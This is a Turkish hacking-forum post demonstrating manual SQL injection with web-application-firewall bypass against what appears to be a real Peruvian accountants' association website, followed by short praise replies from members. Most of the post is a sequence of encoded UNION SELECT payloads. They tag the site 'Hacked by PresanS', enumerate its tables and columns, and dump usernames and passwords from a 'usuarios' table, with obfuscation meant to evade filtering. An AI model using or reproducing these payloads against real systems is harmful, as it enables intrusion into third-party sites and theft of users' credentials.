Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('','Hacked by PresanS',' ','<img src=https://i.hizliresim.com/DPrBm6.gif>',' ','database_name=%0A',database(),' ','user=%0A',user(),' ','version=%0A',version(),' '),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,' '),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,' '),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.

Elinize sağlık

Ustax · 4 Ağu 2023

Eline sağlık güzel bir yazı olmuş

H@cked BaBy · 5 Ağu 2023

Ellerine sağlık Rewan.

unknownworld · 5 Ağu 2023

Hocam unionu selectin başındaki şifrelemeyi neye göre yaptınız

Manuel SQL İnjection, Waff bypass denemesi #1

Yeni üye

Katılımcı Üye

Yeni üye

Uzman üye

Yeni üye

Yeni üye

Üye

Yeni üye

Turan Ordusu Senior

Katılımcı Üye

Kıdemli Üye

Turan Ordusu Senior

Kıdemli Üye

Kıdemli Üye

Katılımcı Üye

Üye

Uzman üye

Yeni üye

Basın&Medya Ekibi Asistanı

Yeni üye